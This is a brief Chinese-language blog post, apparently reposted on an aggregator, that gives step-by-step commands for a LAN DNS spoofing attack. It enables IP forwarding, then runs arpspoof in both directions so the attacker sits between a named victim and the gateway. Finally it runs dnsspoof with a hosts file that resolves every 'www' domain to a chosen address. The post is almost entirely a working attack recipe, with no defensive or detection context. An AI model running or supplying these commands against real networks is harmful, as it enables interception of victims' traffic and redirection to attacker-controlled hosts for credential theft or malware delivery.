美文网首页
局域网dnsspoof攻击

局域网dnsspoof攻击

作者: SHUTUP | 来源:发表于2016-06-26 12:08 被阅读391次

    步骤

    <pre>
    //网关:192.168.2.1
    //受害者:192.168.2.150
    //攻击者:192.168.2.202
    //开启路由转发功能
    echo 1 > /proc/sys/net/ipv4/ip_forward
    //告诉受害者(192.168.2.150 ),网关(192.168.2.1)在我这里(192.168.2.202)
    nohup arpspoof -t 192.168.2.150 192.168.2.1 >/dev/null &
    //告诉网关(192.168.2.1),受害者(192.168.2.150 )在我这里(192.168.2.202)
    nohup arpspoof -t 192.168.2.1 192.168.2.150 >/dev/null &
    dnsspoof -f dnsspoof_list.txt host 192.168.2.150 and udp port 53
    </pre>

    配置

    <pre>
    //典型的dnsspoof_list.txt的内容
    192.168.2.1 www*
    </pre>

    结果

    如果攻击成功,那么从受害者的机器访问任意www域名均会被解析到网关的地址。

    相关文章

      网友评论

          本文标题:局域网dnsspoof攻击

          本文链接:https://www.haomeiwen.com/subject/qygadttx.html